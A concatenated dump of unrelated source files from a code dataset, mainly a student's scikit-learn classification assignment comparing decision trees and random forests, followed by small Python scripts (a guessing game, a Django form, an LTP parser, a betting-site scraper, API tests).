to help you).\n Optional: also optimise the parameters of the model to maximise accuracy\n :param X: Input dataframe\n :param y: Label data\n :return: model, accuracy and prediction of the test set\n \"\"\"\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n # max_features = 1\n # max_depth = 2\n # max_leaf_nodes = 2\n model = DecisionTreeClassifier()\n model.fit(X_train, y_train)\n y_predict = model.predict(X_test) # Use this line to get the prediction from the model\n accuracy = model.score(X_test, y_test)\n return dict(model=model, accuracy=accuracy, test_prediction=y_predict)\n\n\ndef train_iris_dataset_again() -> Dict:\n \"\"\"\n Run the result of the iris dataset again task of e_experimentation using the\n decision_tree classifier AND random_forest classifier. Return the one with highest score.\n Discuss (1 sentence) what you found different between the two models and scores.\n Feel free to change your e_experimentation code (changes there will not be considered for grading\n purposes) to optimise the model (e.g. score, parameters, etc).\n \"\"\"\n df = process_iris_dataset()\n X, y = df.iloc[:, :5], df.iloc[:, 5:]\n\n rf = simple_random_forest_classifier(X, y)\n dt = decision_tree_classifier(X, y)\n print(rf)\n print(dt)\n '''\n !!!Explanation!!!\n I may be inclined to choose the decision tree here (in this specific case) over the random forest\n Though random forests are typically known to be more accurate, this is because they take the average of many\n decision trees, rather than just one. 
This makes the decision tree more efficient in time and space as it requires\n only one tree, instead of many.\n In this specific instance, it seems that on average the decision tree is just as accurate as the random forest\n I believe this is due to the data set being both balanced and easily separable.\n Therefore I will take the decision tree over the random forest, \n as the decision tree is yielding around the same accuracy on average, AND is more efficient.\n This is just for this specific function though, I think overall random forests are usually the way to go, \n even if they require more time and resources to execute; they do solve a lot of accuracy issues the decision\n trees may have, such as overfitting.\n '''\n if rf['accuracy'] > dt['accuracy']:\n print('random forest wins')\n return rf\n else:\n print('decision tree wins')\n return dt\n\n\ndef train_amazon_video_game_again() -> Dict:\n \"\"\"\n Run the result of the amazon dataset again task of e_experimentation using the\n decision tree classifier AND random_forest classifier. Return the one with highest score.\n The Label column is the user column. Choose what you wish to do with the time column (drop, convert, etc)\n Discuss (1 sentence) what you found different between the results.\n In one sentence, why is the score worse than the iris score (or why is it not worse) in your opinion?\n Feel free to change your e_experimentation code (changes there will not be considered for grading\n purposes) to optimise the model (e.g. score, parameters, etc).\n \"\"\"\n\n df = process_amazon_video_game_dataset_again()\n\n '''\n !!!Explanation!!!\n This is the most significant preprocess action I make\n I have decided to remove all rows that have labels that appear less than 10 times in the dataset\n I find this solves many of the issues I was having with this data set\n 1. In classification, the model must train itself using the available labels in the training set, and then tests its\n performance predicting those labels with the testing set. I found as there are many unique instances in this dataset\n the model would evaluate instances that had labels which the model had not even seen before. This is problematic as \n the model would essentially make a guess at the instance, and because it did not know the correct label, it would \n always get it wrong. To fix the data set, it may be good to collect some data to help inflate those unique instances\n and thus balancing the dataset, or to somehow generalize labels so they are not so specific to a point where there\n are single instances with a unique label.\n 2. This also significantly reduces the size of the data set, which allows the model to run efficiently without \n sacrifices to the Decision Tree or Random Forest models. 
The data set is reduced to nearly half of what it used to \n be when you remove unique instances, and even more when you only look at labels that appear at least 10 times.\n '''\n df = df.drop(df[df['user_count'] < 10].index)\n print(df)\n\n X, y = df.iloc[:, 1:], df.iloc[:, :1]\n\n '''\n !!!Explanation!!!\n I decided to drop the time column as I personally don't think it will have a correlation with the target labels.\n The time only seems to indicate the activity of the user, which is easily updates once the user reviews again.\n Thus, my theory is that the model might learn to check when a user is active, which could overfit the model if user\n activity is somewhat random.\n For example, if they reviewed a video game that came out today, after not reviewing one after 10 years,\n the model may not predict the user because it is biased to the activity dates.\n Sometimes sequels to games come out after a long, long time as any video game fan knows, and perhaps a player might\n want to review the newest sequel of a game series they used to like to review.\n I believe the model should be able to predict the user from other features relating to the users rating behaviours,\n but should be independent of time, as there are no set rules to when a user might review\n '''\n X = X.drop(['time'], axis=1)\n '''\n !!!Explanation!!!\n I decided to label encode the 'asin' data column. I believe this may be important to the models classification as\n there may be some sort of pattern between the user and the types of video games they review.\n For example, maybe user John only reviews Halo games, and never Call of Duty games.\n As this data type is a string, I needed some way to encode it. My first thought was one hot encoding but there are \n many different 'asin' attributes, so to one hot encode that we would need to use A LOT of bits. Thus one hot \n encoding seemed inefficient for space, thus label encoding these values seemed to be the next best option, as to the\n model the newly allocated numeric names to the 'asin' data will not change its meaning if patterns are present.\n '''\n le = LabelEncoder()\n X['asin'] = le.fit_transform(X['asin'])\n\n # this is here to convert shape to (n,) to prevent future warnings\n y = y.values.ravel()\n le = LabelEncoder()\n y_encoded = le.fit_transform(y)\n\n '''\n !!!Explanation!!!\n I used a special random forest compared to the others I've been using\n The default estimator size (number of trees in the forest) is 100 according to the scikit learn documentation.\n If I execute my code with that amount of estimators, my computer would run out of memory and the program crashes,\n thus after playing around with the hyper parameter of the random forest, I settled at 5 estimators. Once again, I'm\n sure the ideal number of estimators is more, but due to memory limitations I am using 5 estimators.\n '''\n rf = simple_random_forest_classifier(X, y_encoded, 'Amazon')\n print(rf)\n dt = decision_tree_classifier(X, y_encoded)\n print(dt)\n\n '''\n !!!Results!!!\n The decision tree is returning around a .5 accuracy score. \n The random forest classifier is returning around the same accuracy score on average.\n This specific function takes a long time to run as there is a ton of data to be processed, even with the \n preprocessing.\n\n I think there is room for overfitting here due to the duplicate values in the data set.\n This is an issue because these values may be ending up in both the training and the testing set, leading to a bias\n for that one set. 
It is difficult to compensate for these duplicates with the data we have, so I believe a solution\n to this may be to collect some more data relating to each specific row, perhaps more information relating to the\n users specific review for each review. These features may include some traits coming from the field of NLP, such as \n semantic and sentiment analysis. Perhaps the model would be able to pick up on some patterns relating to how the \n user writes, while also not being biased towards specific labels due to data duplication.\n '''\n if rf['accuracy'] > dt['accuracy']:\n print('random forest wins!')\n return rf\n else:\n print('decision tree wins!')\n return dt\n\n\ndef train_life_expectancy() -> Dict:\n \"\"\"\n Do the same as the previous task with the result of the life expectancy task of e_experimentation.\n The label column is the column which has north/south. Remember to convert drop columns you think are useless for\n the machine learning (say why you think so) and convert the remaining categorical columns with one_hot_encoding.\n (check the c_regression examples to see example on how to do this one hot encoding)\n Feel free to change your e_experimentation code (changes there will not be considered for grading\n purposes) to optimise the model (e.g. score, parameters, etc).\n \"\"\"\n df = process_life_expectancy_dataset()\n '''\n !!!Explanation!!!\n I dropped the year column as there are many and more Nan values within\n It is not really a value you can simply fix by average the columns that are not empty\n Logically that would not make sense, and I believe by doing that the year column would become misrepresented\n I do not predict this to affect accuracy all that much as year should not have that big of an impact on the \n classification of the country being in the north or south, as this function is doing\n '''\n df = df.drop(['year'], axis=1)\n '''\n !!!Explanation!!!\n The expectancy column also has a lot of Nan values, so I decided to replace those Nans with the average of that \n column. I believe this is appropriate as the life expectancy is probably around the same range for each country in\n this dataset, so taking the average of it is a good measure of the life expectancy for any country.\n Note: This hypothesis may not be great as the range of expectancy is quite large, from my preprocessing it will be \n around 75 years; but given that some countries are developing, as well as the data being from many years ago,\n for now I believe the mean can still give a better representation than nothing! \n '''\n mean = get_column_mean(df, 'expectancy')\n df['expectancy'].fillna(value=mean, inplace=True)\n X = df\n X = X.drop(['latitude'], axis=1)\n y = df['latitude']\n print(X)\n print(y)\n\n '''\n !!! 
Explanation !!!\n I decided to label encode the country name\n I could not leave them as strings as the model would not be able to read it, and I think one hot encoding the names\n would be very space innificient as there are many different country names, and we would need a lot of bits to \n one hot encode them all!\n '''\n le = generate_label_encoder(X['name'])\n X['name'] = le.fit_transform(X['name'])\n\n rf = simple_random_forest_classifier(X, y)\n dt = decision_tree_classifier(X, y)\n\n '''\n !!!Explanation!!!\n Both the decision tree and the random forest are performing very well, both with ~.99 accuracy scores.\n From the results, both performed much better than any function we have classified before.\n I am inclined to believe that this data set has lead to some overfitting, due to an unbalanced dataset.\n The dataset for example, has the country Afghanistan many times, each attribute being the same as the year has been\n removed and many of the expectancy missing values are set to that columns mean.\n This introduces overfitting because the duplicate data instances may go into both the training and testing set,\n contamination!! This is not good as the model will be tested on things it already knows, giving it 100% on it \n almost automatically... kind of like the model is cheating on a test. Given a completely brand new data set,\n I think the models performance would drop.\n\n Due to this data imbalance, I don't think this dataset is that great to run classification on, even with all of the \n preprocessing. I believe a solution to this would be to of course balance out the data set, by collecting more \n information about other countries that are less represented in the dataset, as well as add dimensions that are not \n so redundant as missing or mean expectancies; perhaps more general features relating to the weather if we are still\n trying to predict if it is in the north or south.\n '''\n if rf['accuracy'] > dt['accuracy']:\n print('random forest wins')\n return rf\n else:\n print('decision tree wins')\n return dt\n\n\ndef your_choice() -> Dict:\n \"\"\"\n Now choose one of the datasets included in the assignment1 (the raw one, before anything done to them)\n and decide for yourself a set of instructions to be done (similar to the e_experimentation tasks).\n Specify your goal (e.g. analyse the reviews of the amazon dataset), say what you did to try to achieve the goal\n and use one (or both) of the models above to help you answer that. 
Remember that these models are classification\n models, therefore it is useful only for categorical labels.\n We will not grade your result itself, but your decision-making and suppositions given the goal you decided.\n Use this as a small exercise of what you will do in the project.\n \"\"\"\n '''\n !!!My Goal!!!\n I will be using the dataset \"Geography\"\n With this dataset, I want to find out if we can fit a model to predict the World Bank Income Group of a country\n given a some geographical and bank related features\n To find this out, I will preprocess the data in the following ways:\n - Fix any missing data in the columns that are mentioned below\n - Extract and label encode the World Bank groups column into the labels vector \n - Extract and one hot encode World bank region column into the features vector\n - Extract latitude into the features vector\n - Extract longitude into the features vector\n I will train both a Decision Tree and Random Forest to find my goal, and return the model with the greater accuracy\n '''\n df = pd.read_csv(Path('..', '..', 'geography.csv'))\n\n '''\n !!!Explanation!!!\n The only columns with Nans for the target features for this were from the Vatican, \n so I replaced their null values with the values from Italy.\n I know they are technically separate, but until the data set can be filled we will simply consider them the same.\n '''\n df['World bank region'].fillna(value='Europe & Central Asia', inplace=True)\n df['World bank, 4 income groups 2017'].fillna('High Income', inplace=True)\n\n le = generate_label_encoder(df_column=df['World bank, 4 income groups 2017'])\n df = replace_with_label_encoder(df=df, column='World bank, 4 income groups 2017', le=le)\n\n ohe = generate_one_hot_encoder(df_column=df['World bank region'])\n df = replace_with_one_hot_encoder(df=df, column='World bank region', ohe=ohe,\n ohe_column_names=ohe.get_feature_names())\n\n columns = ['Latitude', 'Longitude', 'x0_East Asia & Pacific', 'x0_Europe & Central Asia',\n 'x0_Latin America & Caribbean', 'x0_Middle East & North Africa', 'x0_North America',\n 'x0_South Asia', 'x0_Sub-Saharan Africa']\n X = df[columns]\n y = df['World bank, 4 income groups 2017']\n\n dt = decision_tree_classifier(X=X, y=y)\n #print(dt)\n rf = simple_random_forest_classifier(X=X, y=y)\n #print(rf)\n '''\n !!!My Results!!!\n It seems that once again on average the Decision Tree and Random Forest are yielding similar results.\n Their accuracies are quite low, and range from around 50 to nearly 70 percent accuracy.\n I don't think a lot of overfitting is occurring here, as the datasets are well balanced, and properly split\n into training and testing.\n The data set does have a lack of columns that relate to the economy, wealth, or demographics of the country,\n So I believe that more data may improve the model to fit a mapping between the demographic and wealth data of a\n given country, and its income group (target label).\n Features that could be collected as additional data columns could include things such as average income, employment\n rate, tax information, and more!\n I believe although this model is just a start, it could be beneficial to companies who are figuring out economic\n policies or tax plans. 
I believe, the ability to use this model while trying to come up with plans to benefit a \n country's economy could be useful, with enough relevant training and data :)\n '''\n if rf['accuracy'] > dt['accuracy']:\n #print('random forest wins')\n return rf\n else:\n #print('decision tree wins')\n return dt\n\n\nif __name__ == \"__main__\":\n assert simple_random_forest_on_iris() is not None\n assert reusing_code_random_forest_on_iris() is not None\n assert random_forest_iris_dataset_again() is not None\n assert train_iris_dataset_again() is not None\n assert train_amazon_video_game_again() is not None\n assert train_life_expectancy() is not None\n assert your_choice() is not None\n","repo_name":"noah-sealy-fdl-2021/VisualAnalyticsProjects","sub_path":"assignment2/a_classification.py","file_name":"a_classification.py","file_ext":"py","file_size_in_byte":24531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41173802718","text":"import random\n\nqus = int(random.randint(1, 20))\n\nfor i in range(4):\n print(\"기회가 {}번 남았습니다. 1-20 사이의 숫자를 맞혀 보세요: \".format(4-i))\n ans = int(input(\"\"))\n if ans == qus:\n print(\"축하합니다. {}번 만에 숫자를 맞히셨습니다.\".format(i+1))\n break\n else:\n if ans > qus:\n print(\"Down\")\n else:\n print(\"Up\")\n if i == 3:\n print(\"아쉽습니다 정답은 {}입니다\".format(qus))","repo_name":"jimin8957/My-python-practicing","sub_path":"random_num_game.py","file_name":"random_num_game.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2568133056","text":"from django import forms\nfrom .models import Comment\n\nRATES = [(1,1),(2,2),(3,3),(4,4),(5,5)]\nLIKED = [(True,'Sí'), (False,'No')]\n\nclass CommentForm(forms.ModelForm):\n content_rate = forms.ChoiceField(\n label = 'Calificación del contenido',\n required=True,\n choices=RATES, \n widget=forms.RadioSelect(\n attrs={\n \"class\":\"flex items-center gap-3\"\n }\n )\n )\n class_rate = forms.ChoiceField(\n label = 'Calificación de las clases',\n required=True,\n choices=RATES, \n widget=forms.RadioSelect(\n attrs={\n \"class\":\"flex items-center gap-3\"\n }\n )\n )\n facilitator_rate = forms.ChoiceField(\n label = 'Calificación del tallerista',\n required=True,\n choices=RATES, \n widget=forms.RadioSelect(\n attrs={\n \"class\":\"flex items-center gap-3\"\n }\n )\n )\n description = forms.CharField(\n label = 'Comentarios (opcional)',\n required=False,\n widget=forms.Textarea(\n attrs={\n \"placeholder\": \"Escribe tu opinión del curso, ayúdanos a mejorar\",\n \"class\": \"block p-2.5 w-full text-sm text-gray-900 bg-gray-50 rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500\"\n }\n )\n )\n liked = forms.ChoiceField(\n label='En general, ¿Te gustó el curso?',\n required=True,\n choices=LIKED,\n widget=forms.RadioSelect(\n attrs={\n \"class\":\"flex items-center gap-3 \"\n }\n )\n )\n\n\n class Meta:\n model = Comment\n fields = ('content_rate','class_rate','facilitator_rate','description','liked')","repo_name":"RaySalgado13/FeedbackCourses","sub_path":"feedback/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2119344376","text":"# -*- coding: utf-8 -*-\r\n# @Author : quincyqiang\r\n# @File : sentence_parser.py\r\n# @Time : 2018/8/28 10:46\r\n\r\nimport os\r\nfrom pyltp import 
Segmentor,Postagger,Parser,NamedEntityRecognizer,SementicRoleLabeller\r\n\r\n\r\nclass LtpParser:\r\n def __init__(self):\r\n # path to the LTP models\r\n LTP_DATA_DIR='./ltp_data'\r\n\r\n # word segmentation model\r\n self.segmentor=Segmentor()\r\n self.segmentor.load_with_lexicon(os.path.join(LTP_DATA_DIR,'cws.model'),'ltp_data/lexicon.txt')\r\n # self.segmentor.load(os.path.join(LTP_DATA_DIR,'cws.model'))\r\n\r\n # part-of-speech tagging model\r\n self.postagger=Postagger()\r\n self.postagger.load(os.path.join(LTP_DATA_DIR,'pos.model'))\r\n\r\n # dependency parsing\r\n self.parser=Parser()\r\n self.parser.load(os.path.join(LTP_DATA_DIR,'parser.model'))\r\n\r\n # named entity recognition\r\n self.recognizer=NamedEntityRecognizer()\r\n self.recognizer.load(os.path.join(LTP_DATA_DIR,'ner.model'))\r\n\r\n # semantic role labelling\r\n self.labeller=SementicRoleLabeller()\r\n self.labeller.load(os.path.join(LTP_DATA_DIR,'pisrl_win.model'))\r\n\r\n def format_label_role(self, words, postags):\r\n \"\"\"\r\n Semantic role labelling\r\n :param self:\r\n :param words:\r\n :param postags:\r\n :return:\r\n \"\"\"\r\n arcs = self.parser.parse(words, postags)\r\n roles = self.labeller.label(words,postags,arcs)\r\n roles_dict={}\r\n\r\n for role in roles:\r\n roles_dict[role.index]={arg.name:[arg.name,arg.range.start,arg.range.end] for arg in role.arguments}\r\n return roles_dict\r\n\r\n def build_parse_child_dict(self,words,postags,arcs):\r\n \"\"\"\r\n Dependency parsing --- maintain, for every word of the sentence, a dict storing its dependency child nodes\r\n :param words:\r\n :param postags:\r\n :param arcs:\r\n :return:\r\n \"\"\"\r\n child_dict_list=[]\r\n format_parse_list=[]\r\n\r\n for index in range(len(words)):\r\n child_dict=dict()\r\n for arc_index in range(len(arcs)):\r\n if arcs[arc_index].head==index+1:# arcs indices start from 1\r\n if arcs[arc_index].relation in child_dict:\r\n child_dict[arcs[arc_index].relation].append(arc_index)\r\n else:\r\n child_dict[arcs[arc_index].relation]=[]\r\n child_dict[arcs[arc_index].relation].append(arc_index)\r\n child_dict_list.append(child_dict)\r\n rely_id=[arc.head for arc in arcs] # extract the id of the dependency head node\r\n relation=[arc.relation for arc in arcs]\r\n heads=['Root' if id==0 else words[id-1] for id in rely_id]\r\n\r\n for i in range(len(words)):\r\n a=[relation[i],words[i],i,postags[i],heads[i],rely_id[i]-1,postags[rely_id[i]-1]]\r\n format_parse_list.append(a)\r\n return child_dict_list,format_parse_list\r\n\r\n '''main parser function'''\r\n\r\n def parser_main(self, sentence):\r\n words = list(self.segmentor.segment(sentence))\r\n postags = list(self.postagger.postag(words))\r\n arcs = self.parser.parse(words, postags)\r\n child_dict_list, format_parse_list = self.build_parse_child_dict(words, postags, arcs)\r\n roles_dict = self.format_label_role(words, postags)\r\n return words, postags, child_dict_list, roles_dict, format_parse_list\r\n\r\n\r\nif __name__ == '__main__':\r\n parse=LtpParser()\r\n sentence=\"李克强总理今天来我家了,我感到非常荣幸\"\r\n words, postags, child_dict_list, roles_dict, format_parse_list =parse.parser_main(sentence)\r\n print(words,len(words))\r\n print(postags,len(postags))\r\n print(child_dict_list,len(child_dict_list))\r\n print(roles_dict)\r\n print(format_parse_list,len(format_parse_list))\r\n","repo_name":"yanqiangmiffy/triple_extraction","sub_path":"sentence_parser.py","file_name":"sentence_parser.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"10182804988","text":"import argparse\nimport shutil\nfrom multiprocessing import pool\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom crossing_guide.util import read_image, read_metrics\nfrom
preprocess import pieces\n\nSPANS = np.linspace(-np.pi / 2, np.pi / 2, 15)\n\n\ndef process_piece(root, piece_no, start, end, output_dir: Path, mode):\n timestamps = [p.stem for p in root.rglob(\"*.jpg\")\n if int(p.stem) >= start and int(p.stem) <= end]\n index_to_check = 0 if mode == 'landscape' else 1\n\n for ts in timestamps:\n met = read_metrics(next(root.rglob(\"{}.bin\".format(ts))))\n cat_index = np.where(SPANS > met[index_to_check])[0][0]\n image_file = next(root.rglob(\"{}.jpg\".format(ts)))\n\n if not (output_dir / str(cat_index)).exists():\n (output_dir / str(cat_index)).mkdir()\n\n shutil.copy(str(image_file), str(\n output_dir / str(cat_index) / \"{}.jpg\".format(ts)))\n\n print(\"processed: {}\".format(piece_no))\n\n\ndef preprocess(root: Path, output_dir, mode: str):\n my_pool = pool.Pool(8)\n output_dir = Path(output_dir)\n if not output_dir.exists():\n output_dir.mkdir()\n\n for i, (start, end) in enumerate(pieces):\n my_pool.apply_async(\n process_piece, (root, i, start, end, output_dir, mode))\n\n my_pool.close()\n my_pool.join()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Preprocess Data.')\n parser.add_argument('--root', dest='root',\n required=True, help='root path of data')\n parser.add_argument('--output-dir', dest='output_dir', default='categorized',\n required=False, help='output directory of processed data')\n parser.add_argument('--mode', dest='mode', default='landscape',\n required=False, help='mode of processing: landscape or portrait')\n args = parser.parse_args()\n root = Path(args.root)\n preprocess(root, args.output_dir, args.mode)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tongda/DeepCrossingGuide","sub_path":"preprocess2.py","file_name":"preprocess2.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29335467589","text":"import os\nimport re\nfile1 = open('input.txt', 'r')\nfile2 = open(\"output.txt\", \"w\") \nLines = file1.readlines()\n\nlist_all_words = [] # preserves the order of the entries\n# a headword is allowed to appear in both d1 and d2\nd1 = {}\nd2 = {}\n# headword that is the current link source\nk1 = ''\n# nodes that have already been expanded\nlist_done_words = []\n# the tree diagram is for reference only; a finished tree is never grafted onto another tree\ntree = ''\nprint_tree = False\n# write headword and content, d can be d1 or d2\ndef write_to_d(k,v,d):\n if k not in d:\n d[k] = [v]\n elif v not in d[k]:\n d[k].append(v)\n# expand a headword that has links\ndef dig(k,l=0):\n global tree\n global print_tree\n if l>1:\n print_tree = True\n list_done_words.append(k)\n for item in d2[k]:\n is_in_d1 = False\n if item in list_done_words:\n tree = tree + ' '*4*l+'+---'+item+': ✗'+'\\n'\n continue\n if item in d1:\n is_in_d1 = True\n tree = tree + ' '*4*l+'+---'+item+': ✓'+'\\n'\n for v in d1[item]:\n write_to_d(k1, v, d1)\n if item in d2:\n if not is_in_d1:\n tree = tree + ' '*4*l+'+---'+item+'\\n'\n dig(item,l+1)\n# Split file to d1,d2\ncurrent_word = ''\ncon = ''\nis_head = True\nno_non_link_line = True\nhas_link_line = False\nlinked_word = ''\nword_count = 0\nwarnings = ''\nfor line in Lines:\n # head\n if is_head:\n current_word = line.rstrip(\"\\n\")\n word_count += 1\n if word_count%10000 == 0:\n print('read: '+str(word_count))\n if current_word not in list_all_words:\n list_all_words.append(current_word)\n con = ''\n is_head = False\n no_non_link_line = True\n has_link_line = False\n linked_word = ''\n continue\n # link\n matchObj = re.match('^@@@LINK=(.+)', line)\n if matchObj:\n if has_link_line:\n warnings += 'warning: more than one LINK line in entry: '\n warnings += current_word\n warnings += '\\n'\n linked_word =
matchObj.group(1) \n write_to_d(current_word, linked_word, d2)\n has_link_line = True\n continue\n # end of an entry\n matchObj = re.match('^', line)\n if matchObj:\n if has_link_line and not no_non_link_line:\n warnings += 'warning: both LINK line and non-LINK line found in entry: '\n warnings += current_word\n warnings += '\\n'\n if con != '':\n write_to_d(current_word, con, d1)\n is_head = True\n continue\n # content line\n no_non_link_line = False\n con += line\n\n# 处理d2\nd2_processed_count = 0\nwhile bool(d2):\n k1 = list(d2.keys())[0]\n list_done_words=[]\n tree = k1 + '\\n'\n print_tree = False\n dig(k1,0)\n if print_tree:\n print(tree)\n del d2[k1]\n d2_processed_count += 1\n if d2_processed_count%10000 == 0:\n print('processed: '+str(d2_processed_count))\n\n# now d2 is empty, and all entry is in d1, let’s write d1 to a new file\nf2_entrys_count = 0\nfor entry in list_all_words:\n if entry in d1:\n for content in d1[entry]:\n file2.write(entry)\n file2.write('\\n')\n file2.write(content)\n file2.write('\\n')\n f2_entrys_count += 1\n if f2_entrys_count%10000 == 0:\n print('wrote: '+str(f2_entrys_count))\n\nfile2.close()\n\nprint(warnings)\nprint('words:'+str(word_count)+' (in input file)')\nprint('words:'+str(f2_entrys_count)+' (in output file)')\nprint('words:'+str(len(list_all_words))+' (separate entrys, maybe with empty entrys)')\n\n# remove the last empty line\nwith open('output.txt') as f_input:\n data = f_input.read().rstrip('\\n')\nwith open('output.txt', 'w') as f_output: \n f_output.write(data)\n","repo_name":"edr1412/Mdict-Converter","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41818834836","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 19 21:50:41 2020\n\n@author: Duke Young\n\"\"\"\n\n\nfrom selenium.common.exceptions import NoSuchElementException,StaleElementReferenceException,TimeoutException \nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nimport json\n\n\n\n#//*[@id=\"content-container\"]/home-page/section/div/games-list/div/gamelist/div/div[2]/sport-league-header/div/div[2]/span\n\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"start-maximized\")\n\n#driver = webdriver.Chrome(executable_path='chromedriver.exe',options=options)\n#wait = WebDriverWait(driver,50)\n\ndef edit_leaguename(z,value):\n d = \"\"\n it= 0\n z = z.split()\n \n for i in z:\n if it == 0:\n d = d + i\n elif it == 1:\n d = d + i\n elif it == 2:\n i = i.replace(\",\",\"\")\n d = d + i\n else:\n i = i.replace(\",\",\"\")\n d = d + \"-\" + i\n it = it + 1\n d = value + d\n return d\n \nfinal_list1 = []\n\nleagues = {\"tennis\":\"https://www.eazibet.com.gh/en/tennis/\"}\ndef finding_leagues():\n driver = webdriver.Chrome(executable_path='chromedriver.exe',options=options)\n wait = WebDriverWait(driver,50)\n for l, value in leagues.items():\n driver.get(value)\n length_players = []\n \n Leag = '//*[@id=\"filter-league\"]/div/div/div/select'\n Leag_text = wait.until(EC.presence_of_element_located((By.XPATH,Leag)))\n Leag_text = Leag_text.get_attribute(\"innerText\")\n print(\"Leag_text\")\n Leag_text = Leag_text.split(\"\\n\")\n #print(Leag_text)\n index = Leag_text.index(\"-- All Leagues alphabetically --\")\n \n i = 0\n while i <= index:\n Leag_text.pop(0)\n i = i + 1\n 
#print(Leag_text)\n#https://www.eazibet.com.gh/en/tennis/tennis-atp-nur-sultan-kazakhstan \n L = [edit_leaguename(elem.lower(),value) for elem in Leag_text]\n#v = edit_leaguename(L)\n #print(L)\n #print(\"\")\n \n for li in L:\n v = li.split(\"-\")\n if v[-3] == \"itf\":\n v.pop(-3)\n final_list1.append(\"-\".join(v))\n players_xpath = '//div[@class = \"game__team last_team\"]'\n players = wait.until(EC.presence_of_all_elements_located((By.XPATH,players_xpath)))\n length_of_players = len(players)\n length_players.append(length_of_players)\n driver.close()\n return final_list1,Leag_text,length_players\n\n\n","repo_name":"Jeffery77/local_arbs","sub_path":"tra.py","file_name":"tra.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41723216179","text":"from turtle import Turtle, Screen\r\nimport random\r\n\r\nSCREEN_WIDTH = 600\r\nSCREEN_HEIGHT = 600\r\nSNAKE_SIZE = 20\r\n\r\nclass Food(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.x_possible_pos = (SCREEN_WIDTH/2 - SNAKE_SIZE)/SNAKE_SIZE\r\n self.y_possible_pos = (SCREEN_HEIGHT/2 - SNAKE_SIZE)/SNAKE_SIZE\r\n self.shape(\"circle\")\r\n self.shapesize(stretch_wid = 0.5, stretch_len = 0.5)\r\n self.penup()\r\n self.color(\"red\")\r\n self.set_position()\r\n\r\n def set_position(self):\r\n self.setposition(x = SNAKE_SIZE * random.randint(-1 * self.x_possible_pos, self.x_possible_pos), y = SNAKE_SIZE * random.randint(-1 * self.y_possible_pos, self.y_possible_pos - 1)) #-1 biar ada space for scoreboard text\r\n\r\n def debug(self):\r\n print(self.pos())\r\n\r\n# screen = Screen()\r\n\r\n# food = Food()\r\n# print(SNAKE_SIZE * random.randint(-1 * food.x_possible_pos, food.x_possible_pos))\r\n# print(SNAKE_SIZE * random.randint(-1 * food.y_possible_pos, food.y_possible_pos))\r\n\r\n# screen.exitonclick()","repo_name":"rizkyarchives/journey","sub_path":"python/snake-game/snakeFood.py","file_name":"snakeFood.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73253220901","text":"import json\nimport os\n\nimport pytest\nimport requests\n\nimport loadData.payloadData as Payload\nimport allure\nimport tests.common as common\n\n\n@allure.feature('test_homepage')\nclass TestHomePage:\n @allure.title('test_homepage_carousels')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_carousels(self, get_config_data, api_headers): # 轮播检查\n \"\"\"\n 接口: HomePageCarousels\n\n 检查轮播接口\n \"\"\"\n with allure.step('检查轮播接口'):\n response_json = common.api_post(get_config_data['url'], api_headers, Payload.homepage_carousels())\n print(response_json)\n with allure.step('检查轮播的位置是否为5'):\n assert len(response_json['data']['carousels']) == 5\n with allure.step('检查轮播接口的返回值不包含err '):\n assert 'err' not in response_json\n\n @allure.title('test_homepage_livestream')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_livestream(self, get_config_data, api_headers): # 画廊直播间检查\n \"\"\"\n 接口: HomePageLivestream\n\n 检查首页直播流接口\n \"\"\"\n with allure.step('检查首页直播流接口'):\n response_json = common.api_post(get_config_data['url'], api_headers, Payload.homepage_livestream())\n print(response_json)\n with allure.step('检查轮播接口的返回值不为空 '):\n assert len(response_json['data']['livestreams']['list']) is not None\n with allure.step('检查轮播接口的返回值不包含err '):\n assert 'err' not in response_json\n\n 
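# NOTE: most tests in this class go through the common.api_post helper imported\n    # from tests/common.py. A minimal sketch of what that helper presumably does\n    # (hypothetical reconstruction; the real implementation may differ):\n    #\n    #     def api_post(url, headers, payload):\n    #         response = requests.post(url, headers=headers, json=payload)\n    #         assert response.status_code == 200\n    #         return json.loads(response.text)\n\n    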
